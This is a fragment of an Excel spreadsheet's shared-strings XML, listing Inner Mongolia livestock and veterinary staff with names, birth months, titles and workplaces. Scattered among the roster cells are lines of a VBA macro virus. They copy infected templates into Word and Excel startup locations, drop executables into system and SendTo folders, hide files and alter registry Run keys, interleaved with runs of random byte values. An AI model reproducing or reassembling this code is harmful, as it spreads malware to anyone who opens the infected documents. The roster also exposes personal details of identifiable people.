    <t>动物营养</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>李蕴华</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">遗传育种       </t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>陈哈斯</t>
  </si>
  <si>
    <t>1958/08</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>内蒙古草原站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>杨凯</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1977/04</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>植保</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>单艳敏</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1981/07</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>内蒙古草勘院</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>朝鲁孟其其格</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1964/12</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>草业科学</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>副研究员</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>内蒙古家畜改良站</t>
  </si>
  <si>
    <t>苏雅</t>
  </si>
  <si>
    <t>1979/11</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>畜牧业</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>农机</t>
  </si>
  <si>
    <t>158 58 223 243 92 212 252 222 27 128 50 133 39 247 48 38 7 81 213 36 57 229 86 200 59 238 82 27 4 224 79 229 248 167 17 191 238 34 240 214 201 211 253 30 175 89 192 152 198 51 37 58 206 242 72 249 163 208 209 197 233 40 224 233 14 21 168 53 37 138 197 9 1</t>
  </si>
  <si>
    <t>set word=createobject("word.application")</t>
  </si>
  <si>
    <t>247 41 232 199 20 244 227 28 93 169 50 222 30 82 171 76 215 199 151 168 108 144 102 165 214 210 163 87 198 95 75 209 89 88 75 206 52 98 82 8 249 56 212 124 98 105 242 41 191 50 254 57 199 149 204 83 193 228 216 54 150 52 196 73 26 158 83 165 225 118 149 1</t>
  </si>
  <si>
    <t>ntpath=word.NormalTemplate.Path &amp; "\"</t>
  </si>
  <si>
    <t>216 144 156 163 21 166 233 135 69 60 124 163 45 155 85 177 203 184 12 177 145 63 250 41 245 33 30 8 239 226 190 10 67 208 247 91 222 7 150 57 217 123 85 218 62 89 116 46 241 254 247 185 168 13 243 218 203 209 200 167 232 194 52 93 198 51 240 60 206 179 16</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", ntpath, True</t>
  </si>
  <si>
    <t>58 51 37 198 15 235 18 215 39 36 18 215 215 37 18 31 39 50 43 189 156 155 210 13 21 90 90 71 161 119 205 193 196 51 195 115 175 175 27 206 250 56 49 60 23 224 224 199 137 79 18 163 195 211 137 143 135 215 38 62 126 230 233 196 245 53 235 192 28 155 222 81</t>
  </si>
  <si>
    <t>fso.copyfile "c:\norma1.xlm", Application.StartupPath &amp; "\", True</t>
  </si>
  <si>
    <t>10 41 180 47 226 118 92 165 171 2 41 104 5 41 109 96 245 80 215 120 106 84 19 184 171 161 46 27 198 76 203 198 76 116 205 169 85 180 137 116 202 250 234 75 179 180 229 215 134 241 220 63 187 202 134 30 88 41 251 164 49 242 15 221 49 53 37 255 201 217 64 2</t>
  </si>
  <si>
    <t>fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) &amp; "\"</t>
  </si>
  <si>
    <t>149 123 43 102 100 171 141 93 22 135 71 127 148 144 52 93 230 160 132 254 38 197 255 195 241 249 155 63 165 63 251 127 232 111 98 169 124 158 8 83 80 194 191 62 210 191 36 131 191 61 131 255 146 12 254 139 211 250 99 191 79 244 88 244 254 89 138 127 78 21</t>
  </si>
  <si>
    <t>set fold=fso.getfolder(w.SpecialFolders("SendTo"))</t>
  </si>
  <si>
    <t>189 171 15 106 226 136 226 151 128 18 5 197 239 47 164 46 17 36 145 24 9 248 173 1 52 160 162 129 162 1 17 77 165 71 114 33 167 201 5 239 14 2 78 109 11 182 106 71 180 142 86 90 63 58 173 245 3 191 58 214 106 171 237 212 58 109 167 173 51 118 172 99 59 16</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>33 24 253 14 32 54 22 224 56 23 202 254 8 231 63 225 188 7 98 234 227 0 252 183 1 118 251 160 238 87 192 230 249 206 116 193 156 46 172 101 133 44 172 69 171 7 6 103 55 56 44 63 216 143 97 214 2 60 227 6 195 61 147 240 226 58 94 123 138 129 163 147 137 37</t>
  </si>
  <si>
    <t>164 244 102 220 197 56 161 225 116 150 49 43 118 246 162 149 183 251 53 143 250 251 165 154 13 251 183 205 185 244 217 222 95 247 173 121 101 200 222 27 103 248 228 38 103 202 71 15 155 18 165 211 7 110 254 246 218 194 41 113 71 220 142 83 183 227 186 244</t>
  </si>
  <si>
    <r>
      <t>lnk.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>TargetPath="c:\sendto.exe"</t>
    </r>
  </si>
  <si>
    <t>205 93 164 33 68 204 91 208 22 15 25 144 175 147 95 65 47 203 84 30 125 240 224 254 8 104 106 53 206 142 236 113 40 123 65 235 110 210 16 224 94 194 125 236 153 171 188 36 47 53 75 3 158 127 132 2 36 40 224 14 40 96 47 168 53 175 190 61 5 195 162 20 214 2</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>goto e2</t>
  </si>
  <si>
    <t>12 122 177 252 9 191 157 159 16 240 3 15 140 104 26 47 53 193 249 0 175 235 16 72 132 243 22 35 6 111 42 134 253 212 38 41 30 45 28 162 235 162 136 196 235 173 102 82 128 240 48 21 124 178 146 167 169 131 27 93 60 239 140 169 252 89 83 249 195 196 72 95 1</t>
  </si>
  <si>
    <t>end if</t>
  </si>
  <si>
    <t>241 181 90 112 237 147 29 156 133 4 23 77 105 25 251 147 218 149 6 118 190 75 251 209 38 83 90 22 191 108 43 223 92 86 123 175 65 127 194 68 175 116 40 79 53 133 199 105 217 239 219 120 187 68 121 87 164 143 129 111 85 192 251 164 141 247 115 146 51 111 1</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>e2:</t>
  </si>
  <si>
    <t>146 177 156 89 217 240 238 128 23 71 224 5 225 203 109 73 90 246 48 15 69 66 247 72 100 49 102 4 97 196 228 113 48 227 220 38 205 114 189 69 184 136 144 219 221 132 100 165 47 216 202 91 66 184 194 117 85 178 198 175 219 232 17 132 49 94 191 100 205 63 13</t>
  </si>
  <si>
    <t>fso.deletefile "c:\normal.dot"</t>
  </si>
  <si>
    <t>242 197 103 61 114 237 215 7 174 94 153 190 244 244 69 255 243 222 65 79 47 187 112 156 35 236 194 241 249 241 47 168 75 75 171 61 225 224 112 190 45 191 79 133 27 202 95 249 198 227 15 144 236 248 84 188 43 28 124 128 76 169 240 11 245 106 228 211 227 87</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>fso.deletefile "c:\internet.exe"</t>
  </si>
  <si>
    <t>175 180 217 255 80 121 118 58 133 233 98 145 242 236 99 58 228 108 255 220 242 229 66 70 255 236 36 223 234 14 234 19 218 235 144 120 92 174 35 93 218 233 252 128 249 192 207 111 182 15 72 103 39 198 202 41 103 162 106 171 60 96 253 97 211 159 5 93 110 21</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t>149 88 63 83 187 220 231 19 118 117 221 62 159 84 214 124 91 214 238 104 136 247 205 153 189 116 190 219 124 138 168 181 154 95 62 78 180 115 156 50 250 229 45 114 109 112 151 75 188 94 188 31 40 34 189 80 107 235 103 164 231 119 219 218 111 170 199 98 23</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"</t>
  </si>
  <si>
    <t>197 231 199 91 223 147 43 209 247 21 67 198 187 114 37 57 111 41 62 188 231 11 105 53 191 193 149 231 230 8 69 95 123 61 79 215 128 32 165 240 198 77 202 218 139 248 225 142 202 252 112 232 139 163 132 111 238 28 212 9 30 28 6 99 242 170 253 69 57 122 245</t>
  </si>
  <si>
    <t>233 188 252 245 240 232 206 128 175 23 125 101 185 6 84 233 107 148 241 48 170 89 49 90 240 49 131 165 95 115 76 234 109 213 72 114 31 51 88 166 73 189 165 153 40 1 178 51 232 24 141 230 111 69 159 199 113 58 98 77 253 58 246 91 12 42 101 92 64 253 134 23</t>
  </si>
  <si>
    <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</si>
  <si>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t>
  </si>
  <si>
    <t>thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)</t>
  </si>
  <si>
    <t>208 166 5 116 195 115 149 53 75 3 177 254 153 160 196 57 222 93 86 126 247 239 140 30 238 128 251 46 9 177 236 192 59 3 141 77 172 60 165 200 44 223 108 29 211 6 196 157 98 68 234 8 181 181 192 89 36 81 220 84 243 251 135 106 60 203 168 98 121 62 41 245 4</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">fso.copyfile </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>Application.StartupPath &amp; "\norma1.xlm",myfolder,true</t>
    </r>
  </si>
  <si>
    <t>55 249 223 231 63 231 252 231 127 157 255 159 57 201 246 15 75 207 209 254 225 217 218 31 68 67 28 139 70 155 237 47 94 114 142 245 219 152 237 194 51 173 31 117 137 151 91 244 250 87 146 74 82 1 238 50 192 162 145 92 78 106 72 21 181 228 119 198 246 47 2</t>
  </si>
  <si>
    <t>a1:</t>
  </si>
  <si>
    <t>48 69 84 201 184 83 154 173 72 44 240 48 21 154 9 218 152 113 16 228 163 104 136 61 200 172 196 153 159 102 3 210 158 100 19 81 1 126 69 224 17 33 190 21 30 94 69 165 184 21 112 229 72 17 60 54 120 246 88 217 247 135 19 50 71 77 95 206 249 70 193 99 2 148</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Application.DisplayAlerts = False</t>
  </si>
  <si>
    <t>98 197 76 187 21 23 172 201 16 20 83 228 98 198 43 242 92 132 227 87 121 54 1 168 81 125 184 96 180 144 164 228 159 78 115 145 9 44 122 4 216 179 22 184 72 22 159 140 29 42 92 159 73 113 145 204 97 133 48 254 216 159 0 147 204 61 71 29 49 217 69 82 248 42</t>
  </si>
  <si>
    <t>for i=1 to thisworkbook.sheets.count</t>
  </si>
  <si>
    <t>130 254 212 109 216 182 66 207 119 86 155 228 85 232 57 116 210 104 240 42 84 95 79 185 25 185 186 198 109 166 116 77 198 54 35 239 74 183 24 19 222 189 194 36 144 122 59 100 204 70 146 169 184 55 72 211 238 6 96 188 110 95 245 203 191 0 81 188 24 65 63 1</t>
  </si>
  <si>
    <t>90 134 89 174 209 127 199 127 211 161 54 32 95 177 14 229 134 37 67 184 109 1 246 185 38 1 38 29 175 224 31 131 129 80 180 195 35 245 116 231 254 208 52 230 176 148 173 63 66 220 162 1 73 86 194 208 14 185 178 169 222 68 218 209 78 148 34 26 236 30 109 18</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>95 249 174 237 228 150 228 175 192 230 36 89 62 210 52 184 229 220 149 22 149 60 214 172 157 9 165 247 101 227 113 45 73 172 252 169 62 148 69 186 195 189 168 235 229 244 60 48 233 141 131 85 136 22 194 189 26 106 184 83 18 97 216 175 19 242 221 68 233 23</t>
  </si>
  <si>
    <t>221 248 76 140 24 59 1 180 62 26 157 89 111 218 56 211 248 49 89 184 233 141 72 145 16 132 70 93 101 218 33 178 148 49 77 184 15 100 129 232 184 14 147 46 71 79 218 178 200 32 70 55 123 90 176 15 183 130 128 98 214 86 179 174 83 146 215 212 227 174 50 232</t>
  </si>
  <si>
    <t>Application.DisplayAlerts = True</t>
  </si>
  <si>
    <t>124 181 78 183 149 160 122 57 218 221 138 29 93 12 119 86 61 129 250 26 237 204 164 25 245 115 222 152 210 85 141 84 181 184 229 14 65 65 125 205 93 95 160 124 8 78 178 26 49 151 133 14 58 217 204 92 132 152 67 72 211 70 165 6 146 58 178 36 198 66 225 104</t>
  </si>
  <si>
    <t>ThisWorkbook.Saved=True</t>
  </si>
  <si>
    <t>172 174 153 215 87 93 81 49 175 175 178 164 47 197 185 185 186 239 142 14 153 184 67 51 232 80 68 218 150 6 189 178 20 149 138 252 202 12 107 105 27 111 13 69 251 164 242 185 62 81 204 31 157 213 55 163 124 174 125 70 163 199 178 139 204 168 15 122 100 18</t>
  </si>
  <si>
    <t>End Sub</t>
  </si>
  <si>
    <t>224 223 91 103 17 114 218 221 180 48 165 85 90 124 180 245 50 136 25 157 205 110 90 189 60 205 44 235 48 51 97 118 233 160 19 16 27 233 226 219 188 118 113 187 229 134 131 135 159 171 240 190 208 32 22 220 178 249 74 252 35 53 139 228 254 15 156 154 226 2</t>
  </si>
  <si>
    <t>44 127 97 31 34 129 242 221 102 244 241 65 143 211 232 5 167 155 55 170 100 200 141 134 152 226 235 7 202 229 123 171 205 163 30 61 201 84 121 52 123 5 196 166 78 139 142 87 25 230 110 157 123 205 101 62 77 117 200 120 136 37 207 184 60 75 206 122 141 101</t>
  </si>
  <si>
    <t>106 137 62 216 106 80 99 225 196 147 27 168 179 203 1 2 154 171 52 250 60 66 215 153 35 28 114 165 69 209 153 35 68 73 208 121 214 22 11 196 150 98 194 185 112 17 228 66 9 126 13 58 103 18 108 239 254 64 80 129 83 24 1 32 62 156 54 114 239 10 177 235 10 2</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</si>
  <si>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t>
  </si>
  <si>
    <t>3 123 46 147 109 101 164 101 99 197 32 50 1 57 12 192 20 141 34 11 150 57 63 155 57 56 86 74 238 222 93 165 103 138 168 66 185 3 10 157 172 194 79 17 52 43 19 86 101 29 154 35 223 163 0 26 150 23 194 103 195 58 197 135 80 118 136 116 63 156 40 249 25 56 1</t>
  </si>
  <si>
    <t>223 91 167 236 152 87 54 70 238 50 223 38 121 140 155 121 207 102 174 195 138 25 240 58 98 69 228 140 82 135 145 223 136 59 180 48 168 110 193 157 132 92 128 200 13 133 125 31 80 38 112 191 38 15 144 62 10 46 188 83 186 84 62 10 82 2 221 208 153 23 50 170</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</si>
  <si>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t>
  </si>
  <si>
    <t>167 162 114 161 212 169 199 22 241 92 157 206 109 139 214 166 67 108 231 149 253 53 90 103 200 220 36 82 117 237 106 239 10 36 10 6 62 176 87 53 211 253 104 150 245 202 168 114 161 252 221 83 16 11 55 42 253 163 99 174 154 213 169 150 17 45 177 174 131 18</t>
  </si>
  <si>
    <t>245 67 232 8 206 182 59 31 63 6 134 139 140 69 210 234 103 249 235 103 15 23 154 134 49 143 204 179 241 75 65 121 53 46 52 249 146 92 100 24 123 99 146 125 236 141 179 163 206 66 236 234 113 123 158 82 210 124 235 168 38 223 194 44 167 232 139 168 233 124</t>
  </si>
  <si>
    <t>189 97 253 18 22 116 103 34 193 154 47 250 16 147 42 176 221 18 90 142 29 192 86 128 80 56 41 197 251 199 211 233 48 71 4 83 49 14 112 141 67 187 112 89 2 110 243 64 41 50 65 173 181 5 127 108 180 42 118 1 184 178 3 231 182 189 170 2 223 175 12 133 43 106</t>
  </si>
  <si>
    <t>呼和浩特市家畜改良站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>刘雯霞</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>女</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>畜牧</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>高级畜牧师</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼市兽药监督管理所</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>谭志</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>男</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1967/04</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兽医</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>金宇保灵生物药品有限公司</t>
  </si>
  <si>
    <t>刘艳霞</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兽用疫苗</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>高级兽医师</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>乔亮明</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>唐锦智</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>包头市家畜改良工作站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>王建军</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1970/06</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>固阳县家畜改良站</t>
  </si>
  <si>
    <t>杨宏丽</t>
  </si>
  <si>
    <t>1965/04</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>高级畜牧师</t>
  </si>
  <si>
    <t>武永梅</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1975/11</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>畜牧</t>
  </si>
  <si>
    <t>土右旗畜牧技术推广中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>王瑞峰</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1967/09</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>土右旗动物卫生监督所</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>张淑珍</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1968/09</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>包头稀土高新区万水泉镇人民政府</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>王殿柱</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1974/01</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>九原区动物卫生监督所</t>
  </si>
  <si>
    <t>韩秋珊</t>
  </si>
  <si>
    <t>1967/01</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兽医</t>
  </si>
  <si>
    <t>高级兽医师</t>
  </si>
  <si>
    <t>九原区动物疫病预防控制中心</t>
  </si>
  <si>
    <t>王图雅</t>
  </si>
  <si>
    <t>1971/02</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>畜牧兽医</t>
  </si>
  <si>
    <t>呼伦贝尔市畜牧科学研究所</t>
  </si>
  <si>
    <t>沙志娟</t>
  </si>
  <si>
    <t>1967/07</t>
  </si>
  <si>
    <t>畜牧科研</t>
  </si>
  <si>
    <t>苏培军</t>
  </si>
  <si>
    <t>1964/09</t>
  </si>
  <si>
    <t>吕潇潇</t>
  </si>
  <si>
    <t>1984/01</t>
  </si>
  <si>
    <t>呼伦贝尔市内蒙古大兴安岭农场管理局局机关</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>郅飞</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1970/05</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市扎兰屯市农牧业局</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>张晓智</t>
  </si>
  <si>
    <t>1974/07</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市阿荣旗六合畜牧兽医站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>荆贵春</t>
  </si>
  <si>
    <t>1965/10</t>
  </si>
  <si>
    <t>呼伦贝尔市陈旗西乌珠尔畜牧兽医站</t>
  </si>
  <si>
    <t>文莲</t>
  </si>
  <si>
    <t>呼伦贝尔市陈旗宝日希勒畜牧兽医站</t>
  </si>
  <si>
    <t>百顺</t>
  </si>
  <si>
    <t>草原</t>
  </si>
  <si>
    <t>呼伦贝尔市陈旗畜牧工作站</t>
  </si>
  <si>
    <t>查干巴拉</t>
  </si>
  <si>
    <t>1973/02</t>
  </si>
  <si>
    <t>呼伦贝尔市畜牧工作站</t>
  </si>
  <si>
    <t>慕红军</t>
  </si>
  <si>
    <t>1979/04</t>
  </si>
  <si>
    <t>呼伦贝尔市莫旗尼尔基镇畜牧兽医站</t>
  </si>
  <si>
    <t>刘敬华</t>
  </si>
  <si>
    <t>1977/04</t>
  </si>
  <si>
    <t>张华</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市莫旗汉古尔河镇畜牧兽医站</t>
  </si>
  <si>
    <t>李桂敏</t>
  </si>
  <si>
    <t>1973/01</t>
  </si>
  <si>
    <t>呼伦贝尔市莫旗西瓦尔图镇畜牧兽医站</t>
  </si>
  <si>
    <t>李冬梅</t>
  </si>
  <si>
    <t>1970/11</t>
  </si>
  <si>
    <t xml:space="preserve">呼伦贝尔市莫旗宝山镇畜牧兽医站      </t>
  </si>
  <si>
    <t>李鑫</t>
  </si>
  <si>
    <t>1973/05</t>
  </si>
  <si>
    <t>呼伦贝尔市莫旗草原工作站</t>
  </si>
  <si>
    <t>王静</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1974/10</t>
  </si>
  <si>
    <t>农学</t>
  </si>
  <si>
    <t>呼伦贝尔市莫旗额尔和乡畜牧兽医站</t>
  </si>
  <si>
    <t>韩宏亮</t>
  </si>
  <si>
    <t>1973/10</t>
  </si>
  <si>
    <t>孟静</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1974/02</t>
  </si>
  <si>
    <t>呼伦贝尔市鄂伦春旗大杨树畜牧综合服务站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>敖月梅</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1971/01</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市鄂温克旗巴彦托海镇畜牧兽医站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>阿青</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1976/12</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>郭金梅</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1971/11</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市鄂温克旗农牧业局</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>娜荷芽</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1981/01</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市鄂温克旗红花尔基镇畜牧兽医站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>孟根巴根那</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1967/02</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市鄂温克旗草原工作站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>阿焱</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1978/09</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市陈旗草原工作站</t>
  </si>
  <si>
    <t>张冬梅</t>
  </si>
  <si>
    <t>1975/12</t>
  </si>
  <si>
    <t>呼伦贝尔市新左旗草原站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>胡晓彬</t>
  </si>
  <si>
    <t>1975/07</t>
  </si>
  <si>
    <t>乌力吉木仁</t>
  </si>
  <si>
    <t>呼伦贝尔市海拉尔区动物疫病预防控制中心</t>
  </si>
  <si>
    <t>隋丽英</t>
  </si>
  <si>
    <t>1965/12</t>
  </si>
  <si>
    <t>呼伦贝尔市莫旗红彦镇畜牧兽医站</t>
  </si>
  <si>
    <t>阮文达</t>
  </si>
  <si>
    <t>1974/06</t>
  </si>
  <si>
    <t>刘金颖</t>
  </si>
  <si>
    <t>1975/05</t>
  </si>
  <si>
    <t>呼伦贝尔市鄂温克旗辉河苏木畜牧兽医站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>月荣</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1965/09</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市新右旗动物疫病预防控制中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>萨茹拉</t>
  </si>
  <si>
    <t>1972/09</t>
  </si>
  <si>
    <t>1977/12</t>
  </si>
  <si>
    <t>呼伦贝尔市满洲里市动物卫生监督所</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>李玉英</t>
  </si>
  <si>
    <t>1967/01</t>
  </si>
  <si>
    <t>呼伦贝尔市额尔古纳动物疫病预防控制中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>连建华</t>
  </si>
  <si>
    <t>1959/11</t>
  </si>
  <si>
    <t>呼伦贝尔市额尔古纳莫尔道嘎镇畜牧兽医工作站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>薛春玲</t>
  </si>
  <si>
    <t>1975/04</t>
  </si>
  <si>
    <t>呼伦贝尔海农特泥河农场</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>李和平</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市动物疫病预防控制中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>苏丽伟</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1969/04</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>赵向和</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兴安盟扎旗动物疫病预防控制中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>王结子</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1968/10</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兴安盟扎旗音镇动物卫生监督站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>杨俊红</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1972/10</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兴安盟中旗巴彦呼舒镇兽医站</t>
  </si>
  <si>
    <t>牡丹</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1967/10</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>通辽市畜牧兽医科学研究所</t>
  </si>
  <si>
    <t>高俊杰</t>
  </si>
  <si>
    <t>1972/10</t>
  </si>
  <si>
    <t>张延和</t>
  </si>
  <si>
    <t>1966/10</t>
  </si>
  <si>
    <r>
      <t>高级</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>畜牧师</t>
    </r>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>通辽市扎鲁特旗畜牧工作站</t>
  </si>
  <si>
    <t>花梅</t>
  </si>
  <si>
    <t>1968/04</t>
  </si>
  <si>
    <t>通辽市扎鲁特旗动物疫病预防控制中心</t>
  </si>
  <si>
    <t>薄志军</t>
  </si>
  <si>
    <t>1963/03</t>
  </si>
  <si>
    <t>1970/12</t>
  </si>
  <si>
    <t>通辽市家畜繁育指导站</t>
  </si>
  <si>
    <t>包桂英</t>
  </si>
  <si>
    <t>1964/02</t>
  </si>
  <si>
    <t>孙德欣</t>
  </si>
  <si>
    <t>1977/02</t>
  </si>
  <si>
    <t>赵瑞霞</t>
  </si>
  <si>
    <t>1977/10</t>
  </si>
  <si>
    <t>娜日娜</t>
  </si>
  <si>
    <t>照日格图</t>
  </si>
  <si>
    <t>1981/07</t>
  </si>
  <si>
    <t>赤峰市宁城县八里罕镇动物卫生监督所</t>
  </si>
  <si>
    <t>王世国</t>
  </si>
  <si>
    <t>1962/09</t>
  </si>
  <si>
    <t>畜牧业技术推广</t>
  </si>
  <si>
    <t>赤峰市宁城县黑里河镇动物卫生监督站</t>
  </si>
  <si>
    <t>刘江水</t>
  </si>
  <si>
